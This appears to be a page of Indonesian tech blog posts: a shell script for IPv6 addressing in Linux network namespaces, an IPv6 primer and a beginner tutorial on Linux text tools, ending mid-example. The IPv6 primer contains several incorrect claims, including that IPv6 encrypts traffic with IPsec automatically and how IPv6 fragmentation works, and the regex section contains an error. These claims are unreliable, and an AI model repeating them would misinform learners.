Script ini perlu MAC address router gateway buat menentukan mana interface yang mengarah ke external network.

#!/bin/sh

ROUTER="00:1e:67:9d:c1:9d"
GATEWAY="2001:db8:dead::1"
IP6_REGEX="2001"
IP6_WAN="2001:db8:dead::2/64"

for ns in $(/sbin/ip netns show)
do
        IFACE_WAN=$(/sbin/ip netns exec $ns ip neigh show \
                        | grep "$ROUTER" | head -n1 | awk '{print $3}')

        IP6_WAN_TMP=$(/sbin/ip netns exec $ns ip -6 addr show $IFACE_WAN | \
            grep "$IP6_REGEX" | head -n1 | \
                        awk '{print $2}')

        echo "$IP6_WAN_TMP" | grep "$IP6_REGEX" >/dev/null 2>&1
        if [ "$?" = "0" ]
        then
                continue
        else
                /sbin/ip netns exec $ns ip -6 addr add $IP6_WAN dev $IFACE_WAN
                /sbin/ip netns exec $ns ip -6 route replace default via $GATEWAY
        fi

done

Supaya script ini bisa jalan waktu sistem boot, script ini bisa dieksekusi dari /etc/rc.local.

Artikel Berkaitan:
“Hampir” Semua Tentang IPv6
Tulisan tentang IPv6 yang berusaha komprehensif tapi ternyata gagal membahas semua hal tentang IPv6. “Hampir” Semua Tentang IPv6, dari sejarah, kelebihan IPv6, sampai pengalamatannya.

Membumikan OpenStack
Pengenalan yang “ramah” tentang OpenStack ditulis dengan Layman’s terms.

"Hampir" Semua Tentang IPv6

2016-05-27T00:00:00+08:00

Image: www.worldipv6launch.org

Jaringan komputer awalnya dulu lahir di ARPANET (Advanced Research Projects Agency Network), ARPANET ini organisasi networking yang dibiayai sama Departemen Pertahanan Amerika Serikat ^[1] waktu itu.

Di ARPANET waktu itu, protokol komunikasi perangkat jaringan pakai protokol yang namanya NCP (Network Control Program). Terus di tanggal 1 Januari 1983, NCP ini dirubah ke protokol yang baru, namanya TCP/IP, Protokol baru pengganti NCP yang lebih baik. Transisi ini dikenal dengan “Flag Day” ^[2].

Lahirnya protokol IP ini mulainya era Internet modern, protokol IP ini juga yang kita pakai sampai sekarang.

Awal-awal tahun 90-an waktu Internet mulai dipakai publik dan bukan lagi proyek militer, disini kelihatan kalau IPv4 address yang 4 milyar itu bakalan tidak cukup buat semua perangkat yang terhubung ke Internet nantinya.

Internet kehabisan IP Address

Begitu Internet ini dilepas ke publik, jaringan Internet ini jadi booming. Salah satu aplikasi Internet yang populer waktu itu yang sampai sekarang juga masih populer, seperti WWW (World Wide Web). Boomingnya Internet ini jadi masalah sendiri, IP address yang 4 milyar yang awalnya untuk militer itu begitu dipakai publik jadi kelihatan kalau ini nanti bakalan kurang.

Selain karena populernya Internet, ada satu hal lagi yang bikin Internet cepat sekali kehabisan IP address. Pada waktu itu, IP address dibagi menurut kelas-kelas, atau istilahnya Classful Network.

Kenapa ini jadi masalah? Mari kita lihat gambar ini.

Class A: 2²⁴ = 16.777.216 alamat.
Class B: 2¹⁶ = 65.536 alamat.
Class C: 2⁸ = 256 alamat.

Jadi di Classful Network, subnet bit kelipatan 8.

Ini masalahnya, kalau misalnya ada satu organisasi yang perlu 200 IP address, maka dia dialokasikan IP address kelas C yang isinya 256 IP address. Tapi kalau perlunya 500, dia dialokasikan address kelas B yang isinya 65 ribu ip address. Artinya? Itu berarti lebih dari 60 ribu IP address sia-sia tidak terpakai.

Tentu saja para engineer tidak tinggal diam melihat ini. Supaya borosnya IP address ini bisa direm sedikit, ada dua metode yang efektif dipakai; Classless Inter-Domain Routing (CIDR) sama Network Address Translation (NAT).

CIDR

Classless Inter-Domain Routing (CIDR), dibaca “sidr” atau “saidr”. CIDR ini muncul di tahun 1993 menggantikan pembagian kelas-kelas IP address atau Classful Network di atas.^[3] Jadi, seharusnya pembagian IP address berdasarkan kelas-kelas A, B, C, D, dan E itu sudah tidak dipakai dan diajarkan lagi. Kalau Anda ketemu tutorial yang mengajarkan kelas-kelas IP address, abaikan saja karena kemungkinan itu ditulis sebelum tahun 1993.

Lalu apa bedanya CIDR sama Classful Network?
Kalau Classful Network subnet bit di kelipatan 8, CIDR subnet bitnya bisa di bit ke berapa saja.

Penulisan CIDR dengan menambahkan tanda slash (/) diikuti network bit, misalnya 192.168.0.1/24. 192.168.0.1/24 berarti 24 bit diawal adalah network, sisanya yang 8 bit host nya.

Nah kalau misalnya perlu IP address lebih dari 256, 300 misalnya; tidak perlu langsung ke bit 16 seperti class B, tapi cukup di bit ke 23, penulisannya 192.168.0.1/23.
/23 menyisakan 9 bit untuk host, 9 bit ini maksimal bisa 510 host.

Atau /22 yang menyisakan 10 bit buat host. 10 bit berarti maksimal 1022 host.

Bahkan untuk subnet yang lebih kecil yang cuma perlu 10 IP address, kita bisa pakai /28 yang maksimal 14 IP address.

Jadi bedanya CIDR ini sama Classful Network, pakai CIDR subnet bisa di bit ke berapa saja tergantung kebutuhan, jadinya lebih hemat.

NAT

Network Address Translation (NAT) ini juga salah satu cara penghematan IP address. Pakai NAT, satu IP address bisa dibagi ke banyak host.

Di gambar itu ada 10 host tapi IP address yang dipakai buat koneksi Internet cukup dua saja, 1.1.1.1 dan 2.2.2.2. Dua IP address ini dipakai bersama oleh para host yang ada di belakang NAT.
Host yang ada di belakang NAT, kita bebas pakai IP address private berapa saja karena IP address private tidak terlihat dari Internet. Di gambar itu juga ada host yang sama-sama punya IP address 192.168.0.2, tapi tidak masalah karena mereka ada di belakang NAT.

Kelemahan kalau pakai NAT, host yang ada di belakang NAT itu tersembunyi dari Internet. Jadi dari sudut pandang Internet, mereka ini tidak ada. Internet cuma bisa lihat IP address 1.1.1.1 dan 2.2.2.2 saja.

Ini biasanya bukan masalah kalau para host itu cuma perlu akses email atau browsing web. Tapi kalau seperti server yang IP addressnya harus terlihat dari Internet, NAT tidak bisa dipakai. Biarpun sekarang sudah ada cara-cara supaya NAT bisa dipakai buat server, tapi tetap saja caranya ribet dibanding tanpa NAT.

–

Dua metode di atas, CIDR dan NAT sedikit bisa membantu mengurangi pemborosan IP address. Sedikit artinya IP address exhaustion tetap tidak bisa dihindari, cepat atau lambat IP address ini nantinya bakal habis juga.

Mereka para engineer di Internet Engineering Task Force (IETF) sudah menyadari ini dari lama. Mereka kemudian merumuskan tipe IP baru yang jumlahnya banyak, IP baru ini namanya Internet Protocol Next Generation (IPng) yang kemudian menjadi IPv6 yang kita kenal sekarang.

IPv6 adalah Internet Protocol (IP) jenis baru penerus versi 4 yang hampir habis itu. Jadi sekarang Internet punya dua IP, IP yang lama disebut IPv4 dan IP yang baru disebut IPv6.

Tapi biarpun IPv4 sama IPv6 ini sama-sama IP, ternyata mereka ini berbicara dengan bahasa berbeda. IPv6 yang baru ini tidak bisa berkomunikasi dengan IPv4 yang lama.

Internet menjadi IPv6

Mengapa Internet perlu beralih ke IPv6?

IPv4 address cuma 32 bit atau 4 milyar, ini tidak cukup buat semua perangkat di dunia.
IPv6 lebih secure.
Metode routing IPv6 lebih efisien.
Tidak perlu alasan lagi.

IPv6 sepanjang 128 bit, jumlahnya 3,4x10³⁸. Jumlah ini lebih dari cukup untuk semua bintang yang ada di langit, mungkin saja.
Buat Anda yang tidak terbiasa dengan notasi ilmiah 3,4x10³⁸, jumlah 2¹²⁸ adalah:

340.282.366.920.938.463.463.374.607.431.768.211.456

Saya bahkan tidak tahu bagaimana cara membaca angka itu.

Jaringan IP adalah jaringan yang sangat tidak aman. Kalau kita akses Internet pakai protokol yang tidak terenkripsi, bisa jadi paket IP yang kita kirim dan terima itu dilihat, dimonitor, bahkan sampai level yang ekstrem paket IP itu dimodifikasi tanpa kita sadar. Virtual Private Network (VPN) muncul karena adanya problem ini, VPN dipakai buat enkripsi paket IP.

Protokol IPSec^[4] banyak dipakai buat VPN yang biasanya buat komunikasi kantor pusat dan cabangnya, atau buat komunikasi data yang sifatnya sensitif. Di IPv4, kalau mau pakai IPSec ini kita perlu konfigurasi tambahan di router atau host dan biasanya tidak gampang.

Di IPv6 IPsec ini bagian dari protokol, jadi kalau kita pakai IPv6 secara otomatis sudah pakai IPSec tanpa perlu konfigurasi apa-apa. Ini karena memang dari awalnya IPSec ini didesain untuk IPv6.

IPSec memastikan enkripsi paket IP secara end-to-end. Artinya paket itu dienkripsi oleh host pengirim, terus di-decrypt oleh penerima. Siapa saja diantara pengirim dan penerima tidak ada yang bisa melihat, merubah, atau mengacaukan paket IP itu.

Dari segi routing, IPv6 juga lebih efisien dibanding IPv4. Karena itu, routing IPv6 jadi lebih cepat.
Di IPv4, setiap router yang melakukan forward paket IP harus menghitung IP checksum untuk memastikan paket yang diterima itu utuh dan tidak rusak. Di IPv6 tidak ada IP checksum, IPv6 mengatakan bahwa kewajiban pemeriksaan paket ada di layer di atasnya, bukan di IP.

Di protokol IP juga ada yang namanya packet fragmentation. Ini terjadi kalau paket yang akan dikirim lebih besar dari Maximum Transmission Unit (MTU) di network interface. Jadi paket IP harus dipotong-potong jadi kecil supaya muat di MTU, terus potongan-potongan ini dikirim berulang-ulang sampai habis.
Si penerima yang menerima paket yang terpotong-potong ini harus menunggu sampai semua potongan terkumpul, terus potongan-potongan itu digabungkan lagi jadi satu paket IP yang utuh.

Di IPv4, tugas memotong-motong paket dan menggabungkan paket ada di host dan router. Jadi, router sebelum meneruskan paket itu menunggu sampai semua potongan terkumpul terus menggabungkannya. Proses itu dilakukan semua router yang dilewati paket IP itu kalau MTU tidak cukup besar buat paket.

Kelebihan IPv6, IPv6 menangani packet fragmentation ini dengan lebih cerdas, router tidak ikut-ikutan memotong-motong paket IP. Misalnya router menerima potongan paket IPv6, router tidak menunggu tapi dia langsung teruskan potongan paket itu ke hop berikutnya. Begitu seterusnya sampai potongan paket itu diterima di host terakhir.

Host penerima yang terakhir inilah yang bertugas mengumpulkan potongan-potongan paket dan menggabungkannya jadi satu paket IPv6 yang utuh. Jadi proses fragmentasi itu ada di ujung-ujungnya saja. Dengan begini, proses routing lebih cepat dan efisien.

IPv6 Address

IPv6 address sepanjang 128 bit, ditulis dengan karakter Heksadesimal.

Satu karakter heksadesimal itu sama dengan 4 bit biner, dan setiap 16 bit dipisahkan dengan titik dua.

Angka nol yang berdekatan bisa diringkas pakai dua titik dua (::), Misalnya 2001:db8:0:0:82c1:6eff:fe59:2e43 menjadi 2001:db8::82c1:6eff:fe59:2e43.
Tapi kalau ada dua grup angka nol, penulisan ringkas cuma bisa di salah satunya saja. Misalnya 2001:db8:0:0:82c1:0:0:2e43 bisa ditulis 2001:db8::82c1:0:0:2e43 atau 2001:db8:0:0:82c1::2e43 tapi tidak 2001:db8::82c1::2e43.

Seperti di gambar itu, IPv6 yang 128 bit itu dibagi 2. 64 bit yang awal adalah bit untuk network, 64 bit yang terakhir untuk host.

Penggunaan 64 bit untuk host ini diatur di RFC 5375^[5]. Jadi di IPv6, tidak ada subnet lebih kecil dari /64. Misalnya di satu jaringan cuma ada 10 host, network yang dipakai tetap /64.

Ada satu pengecualian penggunaan network yang lebih kecil dari /64. Untuk link inter-router, link yang isinya cuma ada dua router dianjurkan pakai /127. Penggunaan /127 untuk link inter-router ditulis di RFC 6164^[6].

EUI-64
EUI-64^[7] dipakai buat generate 64 bit host atau 64 bit terakhir IPv6 address berdasarkan MAC address. Cara penomoran alamat host bisa saja kita atur berurutan seperti waktu IPv4, alamat host 1, 2, 3 dan seterusnya, atau bisa acak diambilkan dari alamat MAC. Metode yang terakhir inilah yang namanya EUI-64.

Tapi ada problemnya, alamat MAC itu cuma 48 bit, host IPv6 64 bit. Supaya bisa jadi 64 bit, ditambahkan 16 bit angka hex 0xfffe di tengah-tengah MAC address.

Selain itu, bit ke tujuh juga harus dirubah ke 1 supaya menandakan bahwa EUI-64 ini diatur secara lokal.

Saya pakai contoh buat EUI-64 dari MAC 80:c1:6e:59:2e:43. Step untuk membuat EUI-64 kurang lebih seperti di bawah:

1) Ambil MAC address dan bagi dua.
MAC address dibagi jadi dua bagian, 24 bit Organizationally Unique Identifier (OIU) dan 24 bit Network Interface Card ID (NIC).

2) Tempatkan 16 bit hex 0xfffe di tengah-tengah MAC address.

3) Rubah bit ke 7 ke angka 1 untuk menandakan universal atau local.
Setiap MAC address yang terdaftar dan di-assign oleh Institute of Electrical and Electronics Engineers (IEEE), bit ke 7 pasti 0 yang menandakan bahwa ini alamat yang universal. Di EUI-64, bit ke 7 ini harus dirubah ke 1 yang menandakan bahwa alamat ini diadministrasi secara lokal.

Jadinya, 64 bit host EUI-64 dari MAC address 80:c1:6e:59:2e:43 adalah 82c1:6eff:fe59:2e43. Tinggal digabungkan dengan 64 bit networknya, untuk link-local misalnya fe80::82c1:6eff:fe59:2e43.

Sebenarnya EUI-64 ini kerjaannya software, bukan orang. Di OS router misalnya, kalau kita set EUI-64 software yang bakal hitung sama setting itu. Di OS modern seperti Linux juga, EUI-64 ini juga otomatis ter-set tanpa ada campur tangan user.

Tapi biarpun begitu, saya rasa tidak ada salahnya kan memahami teori dibalik EUI-64 ini?

Tipe IPv6 address

Sama seperti IPv4, IPv6 address juga dibagi ke beberapa tipe ^[8] di bawah:

Unicast.
Multicast.
Anycast.

Unicast

IPv6 Unicast address adalah tipe IPv6 address yang dipakai buat komunikasi satu lawan satu. Misalnya Anda ngobrol berdua dengan teman Anda secara privat, jenis obrolan seperti ini kalau di protokol IP namanya unicast.

Dalam obrolan unicast, pihak yang tidak berkepentingan tidak bisa mendengar obrolan itu, apalagi ikut menjawab.

Di IPv6, unicast address ini dibagi lagi jadi tiga, Global Unicast Address, Link-local Address, sama Unique Local Address.

A) Global Unicast Address
Global Unicast Address ini jenis IPv6 unicast yang dipakai buat komunikasi di Internet, kalau di IPv4 namanya ip address publik. Ini jenis IP address yang diatur sama Regional Internet Registry (RIR). Kalau kita di Indonesia, yang kelola IP address jenis ini ada di APNIC, RIR untuk wilayah Asia Pasifik.

APNIC alokasikan alamat IPv6 tipe ini ke organisasi sama ISP, terus para ISP ini mendistribusikan IPv6 address ini ke pelanggan-pelanggan mereka.
Untuk di awal, biasanya alokasi IPv6 address untuk ISP sebanyak /32.

B) Link-local Address
Link-local address dipakai buat komunikasi unicast yang sifatnya lokal dan cuma sebatas link, jadi link-local ini tidak bisa melewati router. Block alamat IPv6 address yang dialokasikan untuk jenis ini adalah fe80::/10.

Beda sama IPv4, kalau di IPv6 link-local ini wajib ada di setiap interface, IPv6 bakalan tidak berfungsi kalau jenis link-local ini tidak ada.
IPv6 address jenis ini biasanya di-set secara otomatis oleh OS pakai EUI-64, jadi user tidak perlu konfigurasi apa-apa.

Kalau Anda punya mesin Linux yang modern, bisa dicek pakai command ip.

# ip addr show wlan0
3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 18:4f:32:59:88:33 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.11/28 brd 10.10.10.15 scope global wlan0
        valid_lft forever preferred_lft forever
    inet6 2xxx:exxx:0:a:1a4f:32ff:fe59:8833/64 scope global mngtmpaddr dynamic 
        valid_lft 7180sec preferred_lft 1780sec
    inet6 fe80::1a4f:32ff:fe59:8833/64 scope link 
        valid_lft forever preferred_lft forever

IPv6 yang paling bawah fe80::1a4f:32ff:fe59:8833/64 dengan scope link itu alamat link-local.

IPv6 address jenis ini dipakai buat neighbor discovery, buat cari tahu ada router atau tidak, kalau ada router dimana alamat IPv6 nya. IPv6 address jenis ini juga dipakai protokol dynamic routing OSPFv3. Jadi IPv6 address unicast yang jenis ini penting sekali.

C) Unique Local Address
Kalau di IPv4 kita punya blok private IP address, salah satunya seperti 192.168.0.0/16 yang kita bebas pakai di mana saja, di IPv6 juga ada. Alokasi IPv6 address untuk unicast jenis ini adalah fc00::/7. Jadi buat jaringan yang sifatnya lokal, kita bisa pakai IP address jenis ini.

Tapi ada bedanya sama IPv4, IPv6 address jenis ini tidak bisa dipakai buat Internet, cuma bisa lokal saja. Jadinya router kalau terima paket dari IPv6 address jenis ini, dia tidak mau meneruskan paket kalau tujuannya jenis Global Unicast, tapi paket diforward kalau tujuannya juga jenis Unique Local.

Dulu ada satu lagi jenis unicast address, namanya site-local dengan blok address fec0::/10. Tapi jenis yang ini tidak lagi dipakai dan digantikan Unique Local.

Multicast

Multicast adalah metode komunikasi one-to-many dan many-to-many, multicast ini ada grup-grup. Misalnya kalau Anda ngobrol sama sekelompok orang di satu ruangan, komunikasi ini namanya multicast. Mungkin di ruangan itu juga ada kelompok yang lain lagi, tapi karena Anda tidak bicara sama mereka, grup itu juga tidak akan merespon Anda. Jadi cuma grup yang dituju saja yang merespon.

Jenis komunikasi multicast ini banyak dipakai buat tv broadcasting atau streaming. Pakai multicast, server tidak perlu buat banyak koneksi secara bersamaan, cukup satu koneksi saja.

Di IPv6, blok untuk alamat multicast adalah ff00::/8.

Anycast

Kalau multicast ke satu grup, anycast ke salah satu member dari grup.

Paket IP yang ditujukan ke alamat anycast akan dikirim ke salah satu member dari grup anycast itu, tidak semua.

Contoh penggunaan anycast misalnya di DNS root server. Root server ini di dunia ada 13 alamat IP nya, tapi jumlah fisiknya lebih dari itu.

Misalnya kita query dns ke salah satu root server a.root-servers.net yang IPv6 address-nya 2001:503:ba3e::2:30. User di belahan dunia lain yang juga query ke alamat IPv6 2001:503:ba3e::2:30 bisa jadi servernya tidak sama dengan kita biarpun IPv6 address-nya sama-sama 2001:503:ba3e::2:30.

Jadi, IP address anycast ini adalah IP address yang sama tapi ditempatkan di node yang berbeda. Paket IP yang ditujukan ke alamat anycast akan dikirim ke salah satu saja dari grup anycast dan biasanya yang paling dekat.

IPv6 anycast ini juga bisa dipakai buat failover kalau misalnya salah satu node down, bisa digantikan yang lain secara otomatis.

Apa yang tidak ada di IPv6?

Bukan cuma ada penambahan, di IPv6 juga ada pengurangan.

Broadcast
Tidak ada lagi komunikasi broadcast di IPv6, begitu juga tidak ada IPv6 address jenis broadcast. Broadcast ini komunikasi satu ke banyak. Kalau unicast Anda ambil ponsel dan telepon ke orang yang dituju, tapi kalau broadcast Anda ambil speaker supaya orang satu RT bisa dengar semua.

Di IPv6, broadcast tidak ada tapi diganti sama multicast.

NAT
Dengan jumlah IP address sebanyak 3,4x10³⁸, apakah kita masih perlu NAT? tentu saja tidak.

Setiap perangkat yang terhubung ke Internet, apakah itu server, desktop, laptop sampai smartphone kalau terhubung lewat IPv6 semua terekspos ke Internet.

Mungkin juga ada yang berpendapat dengan tidak adanya NAT, perangkat yang ber-IPv6 itu jadi tidak aman karena terekspos ke Internet.
Ini mungkin betul tapi juga salah. NAT, biarpun bisa menyembunyikan host di belakangnya tapi NAT ini bukanlah firewall, jadi jangan dianggap NAT ini seperti firewall.

Jadi biarpun perangkat yang pakai IPv6 terekspos ke Internet, ini tanggung jawab administrator bagaimana mengatur firewall IPv6 supaya bisa secure.

Conclusion

Mungkin, mungkin saja IPv6 ini terlihat lebih horor daripada IPv4. Ini juga yang dulu saya pikirkan, dan Saya yakin banyak yang sependapat. Alasannya mungkin saja karena:

128 bit, ini panjang sekali.
Ditulis pakai heksadesimal, angka yang saya tidak pernah diajarkan waktu di SD.
Karena bukan IPv4.

Tapi apakah benar IPv6 ini susah?
Coba kita lihat kenapa Luke Skywalker gagal mengangkat pesawat X-wing.

Image source: picturequotes.com

Karena menurutnya, X-wing itu terlalu besar.

Refs:

Artikel Berkaitan:
Subnetting IPv6 bisa semudah IPv4, bahkan lebih mudah.
Cara menghitung subnetting IPv6 dengan mudah.

Belajar Linux Dasar - Manipulasi Teks dan Stream

2016-05-20T02:47:00+08:00

Image source: www.linuxnix.com

Selamat pagi, siang, atau malam. Selamat datang kembali di seri pembelajaran Linux Dasar. Kalau Anda baru bergabung, Anda bisa lihat tulisan sebelumnya lewat link di bawah:

1. Belajar Linux Dasar - Pengenalan Input & Output
2. Belajar Linux Dasar - Manajemen file

Di artikel ini saya tuliskan tentang manipulasi teks dan stream. Teks sudah jelas, tapi stream?
Stream itu stdin, stdout, dan stderr yang sudah dibahas di tulisan yang pertama, proses manipulasi stream ada di I/O itu.

Jadi misalnya input program dari stdin itu A, keluar di stdout berubah jadi B, nah proses merubah A ke B ini disebut manipulasi stream.

Tahukan Anda? bahwa salah satu the greatest strength, atau kekuatan terbesar Unix dan Linux itu ada di kemampuannya memanipulasi teks dan stream.
Saya paham itu, karena dulu sekali saya juga pengguna Windows, dan tidak ada hal yang seperti ini di Windows.

Karena itu sebagai Linux Engineer, hal yang satu ini wajib dikuasai. Sejenak kita tinggalkan GUI, pakai command dan rasakan kekuatan Linux sebenarnya.

Benar GUI sudah maju, tapi sehebat-hebatnya GUI tidak bisa menandingi fitur teks dan stream manipulation ini. Pelajari dan buktikan sendiri.

Baik, kita lihat apa saja program yang dibahas kali ini:

Wildcard & Regular Expression
cut
head & tail
tr
sort
uniq

Selain program di atas, saya juga tambahkan beberapa program yang bukan dari Coreutils. Program-program ini krusial dan penting.

more & less
awk
grep
sed

Wildcard & Regular Expression

Pernah lihat command yang mirip seperti ini?

grep '^[0-9]{1,3}.*$' data.txt

Karakter-karakter aneh itu namanya karakter Regular Expression atau regex atau regexp.

Wildcard dan regex itu karakter-karakter spesial yang diartikan secara berbeda oleh shell atau program.

Mungkin Anda bertanya, apa pentingnya saya memahami ini?
Sebenarnya tanpa paham wildcard atau regex, kita sudah bisa pakai command di shell Linux. Tapi dengan sedikit memahami ini, banyak task yang ribet bisa jadi mudah.

Menurut saya tidak ada ruginya pelajari wildcard sama regex.

Wildcard sama regex ini fungsinya kurang lebih sama, mencari pola karakter dalam string. Bedanya, karakter wildcard diproses di Linux Shell seperti bash, dash, dan lainnya. Regex diproses oleh program, contoh di atas itu pakai program grep.

Wildcard

Wildcard ini karakter-karakter spesial di shell Linux. Pakai wildcard kita bisa beroperasi di banyak file sekaligus.

Masing-masing karakter wildcard artinya beda-beda, saya list dan jelaskan satu-satu.

*: Asterisk atau tanda bintang.
?: Question mark atau tanda tanya.
[]: Square bracket atau kurung siku.
[!]: Exclamation mark, tanda seru dalam kurung siku.
{}: curly bracket atau kurung kurawal, dan.
\: Backslash.

Asterisk (*)
Tanda bintang atau asterisk mewakili karakter apa saja, jumlahnya bisa berapa saja termasuk nol.

Jadi mp* bisa berarti mp, mp3, mp4, atau mp apa saja.

Misalnya saja kita punya tiga file dengan nama berbeda:

touch a.txt
touch ab.txt
touch abc.txt

Kita punya tiga file a.txt, ab.txt, dan abc.txt.
Kita bisa filter output ls pakai bintang

ls a*.txt
abc.txt  ab.txt  a.txt

Jadi, tanda bintang itu mewakili karakter apa saja, dengan jumlah berapapun.
a*.txt artinya huruf a diikuti karakter apa saja, jumlahnya berapa saja diikuti dengan .txt.

Tanda tanya (?)
Karakter ini (?) mewakili karakter apa saja, tapi jumlahnya satu.

Contohnya kalau kita mau filter command ls untuk tipe file mp3, mp4 misalnya:

ls *mp?

*mp? artinya, karakter apa saja dengan jumlah berapa saja, diikuti karakter mp, dan diikuti satu karakter apa saja.

Jadi ls *mp? akan match file dengan ekstensi mp3, mp4, mpg, mp2, dan mp apa saja.

Square bracket ([])
Karakter yang ada di dalam kurung siku adalah satu set karakter. Gampangnya kita bisa baca set karakter di kurung siku ini dengan atau.

Contoh, [abc] bisa dibaca a atau b atau c.

Misalnya kita mau filter output command ls untuk tipe file jpg dan mpg

ls *.[mj]pg

Jadi, *.[mj]pg bisa dibaca karakter apa saja dengan jumlah berapa saja, diikuti tanda titik (.), terus diikuti karakter m atau j, dan diikuti karakter pg.

Tanda seru dalam kurung siku ([!])
Ini sama dengan yang sebelumnya, hanya saja kebalikannya. Kalau [mj] berarti m atau j, [!mj] berarti apa saja selain m dan j.

Curly backets atau kurung kurawal ({})
Kalau kurung siku bisa dibaca atau, kurung kurawal ini bisa dibaca dan. Bedanya juga, di kurung kurawal masing-masing pattern dipisah pakai koma.

Jadi {o,p}df berarti odf dan pdf.

Contoh saja, dari pada kita hapus satu-satu file pdf dan odf, kita bisa pakai satu command.

rm *.{o,p}df

Backslash ()
Ini untuk escape karakter spesial. Kalau tanda tanya ? berarti satu karakter apa saja, tapi kalau ditempatkan backslash didepannya \?, tanda tanya itu jadi hilang arti spesialnya, dan cuma berarti tanda tanya.

Regular Expression

Regex ini karakternya sedikit lebih kompleks dari wildcard. Oke, bukan sedikit, tapi jauh lebih kompleks.

Perhatikan set karakter regex dibawah.

^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$

Biarpun terlihat rumit, arti regex di contoh itu cuma email address. Cuma gambaran saja bahwa Regular Expression karakternya lebih banyak dibanding wildcard.

Seperti yang saya sebutkan di atas, regex ini prosesnya bukan di shell, tapi di program. Jadi command seperti di bawah ini tidak valid.

ls ^[abc]

Tidak valid karena penggunaan regex di shell.

Apa saja karakter Regular Expression?

Dot atau tanda titik (.)
Artinya satu karakter apa saja. Sama seperti tanda tanya kalau di wildcard. Jadi mp. bisa berarti mp3 atau mp4.

Backslash (\)
Artinya sama dengan backslash di wildcard, dipakai buat escape karakter spesial.

Asterisk (*)
Berarti match nol atau lebih untuk karakter seblumnya. a* berarti a, aa, aaa, dan seterusnya. Sedangkan .* (dot dan asterisk) berarti karakter apa saja dengan jumlah nol atau lebih. Ini karena . (dot) berarti karakter apa saja di regex.

Plus (+)
Berarti satu atau lebih untuk karakter sebelumnya. a+ berarti aa, aaa, aaaa, dan seterusnya.

{min,max}
min dan max itu angka misalnya {1,2}. Artinya jumlah karakter sebelumnya minimal 1 dan maksimal 2.
Jadi a{2,3} bisa jadi aa dan aaa, tapi tidak aaaa karena melebihi nilai max.

Caret (^)
Artinya karakter pertama di baris teks. ^a berarti baris teks yang karakter pertamanya a.

Tanda dolar ($)
Ini kebalikan dari ^, yang berarti karakter terakhir. a$ berarti baris teks yang karakter terakhirnya adalah a.

Kurung siku ([])
Artinya sama dengan kurung siku di wildcard. [ab] berarti a atau b.

[^]
Sama seperti [!] di wildcard. [^ab] berarti bukan a dan bukan b.

|
Berarti salah satu dari pattern. (a|b|c) berarti salah satu saja antara a atau b atau c.

Di atas itu karakter-karakter Regular Expression. Regex ini dipakai di program seperti grep, awk, dan sed yang juga ada di tulisan ini.

Pusing?
Ingat, Anda membaca ini atas kemauan sendiri dan tanpa paksaan dari pihak manapun.

Kita lanjut ke program.

cut

cut dipakai buat filter output berdasarkan delimiter dan field, input program cut bisa dari stdin atau file.

cut OPTION... [FILE]...

Lebih gampang dijelaskan pakai contoh, misal kita punya file dengan nama data.txt yang isinya seperti di bawah

satu    dua     tiga    empat

Masing-masing kata itu dipisahkan dengan delimiter tab, jadi satu<tab>dua<tab>tiga<tab>empat. Nah yang disebut field itu kata satu, dua, tiga, dan empat.
Field ini dihitung field 1, field 2, dan seterusnya, dihitung dari kiri. Jadi field 1 itu kata satu, field 4 itu kata empat.

Sekarang, kita lihat penggunaan cut yang umum.
Misalnya kita mau filter output file data.txt untuk field 3 saja:

$ cut -f3 data.txt
tiga

Kalau kita mau print field 2 sampai field terakhir, pakai dash (-).

$ cut -f2- data.txt
dua    tiga    empat

Bagaimana kalau field 1 sama field 3?

$ cut -f1,3 data.txt
satu   tiga

cut juga bisa pakai stdin selain file. Jadi kita bisa pakai pipe, misalnya:

$ cat data.txt | cut -f1,3
satu   tiga

cut secara default pakai delimiter tab, jadi bagaimana kalau isi file data.txt seperti ini?

satu,dua,tiga,empat

Kata-kata di file itu dipisah pakai koma, bukan tab. Jadi kita harus secara spesifik instruksikan cut supaya pakai delimiter koma, caranya dengan argumen -d diikuti karakter delimiter-nya.

$ cat data.txt | cut -d, -f3
tiga

head & tail

command head dan tail dipakai untuk membatasi jumlah baris yang diprint ke stdout.

 tail [OPTION]... [FILE]...
 head [OPTION]... [FILE]...

Bedanya head sama tail, head dihitung dari baris pertama, kalau tail dihitung dari baris terakhir.

Misal kita punya file data.txt yang isinya ada 11 baris teks.

$ cat > data.txt << EOF
> satu
> dua
> tiga
> empat
> lima
> enam
> tujuh
> delapan
> sembilan
> sepuluh
> sebelas
> EOF

Tes command head

$ head data.txt
satu
dua
tiga
empat
lima
enam
tujuh
delapan
sembilan
sepuluh

Kalau command tail

$ tail data.txt
dua
tiga
empat
lima
enam
tujuh
delapan
sembilan
sepuluh
sebelas

Kelihatan bedanya?
Ya, jadi secara default head menampilkan 10 baris teks dihitung dari baris pertama. tail menampilkan 10 baris dihitung dari baris terakhir.

Kalau kita mau kurang atau lebih dari 10, bisa pakai argumen -n

$ head -n2 data.txt
satu
dua
$
$ tail -n2 data.txt
sepuluh
sebelas

Tentu saja kita juga bisa pakai stdin lewat pipe selain file.

$ cat data.txt | tail -n2
sepuluh
sebelas

tr

tr dipakai untuk translasi atau hapus set karakter.

tr [OPTION]... SET1 [SET2]

tr ini inputnya dari stdin dan print output ke stdout. saya biasanya pakai tr buat konversi karakter atau hapus karakter.

Misal kita mau convert huruf kecil ke besar

$ echo "abcd" | tr [:lower:] [:upper:]
ABCD

Kalau mau sebaliknya, tinggal dibalik saja tr [:upper:] [:lower:]

tr ini berguna buat misalnya merubah newline jadi tab. Contoh kita buat file data.txt yang isinya seperti ini:

$ cat > data.txt << EOF
> abcd
> efgh
> EOF

File data.txt yang isinya dua baris. Kita bisa rubah newline (\n) ke tab (\t).

$ cat data.txt | tr '\n' '\t'
abcd   efgh

Atau newline ke spasi

$ cat data.txt | tr '\n' ' '
abcd efgh

Atau jadi dash (-).

$ cat data.txt | tr '\n' '-'
abcd-efgh-

Kita juga bisa pakai tr buat hapus karakter tertentu pakai argumen -d. Contoh, hapus huruf c dari stream.

$ cat data.txt | tr -d 'c'
abd
efgh

sort

sort, seperti namanya dipakai buat sorting baris teks dari stdin atau file.

sort [OPTION]... [FILE]...

Mari kita coba dengan file data.txt yang tidak berurutan.

$ cat > data.txt << EOF
> zebra
> charlie
> bravo
> kilo
> 456
> 123
> EOF

Sort file data.txt

$ sort data.txt
123
456
bravo
charlie
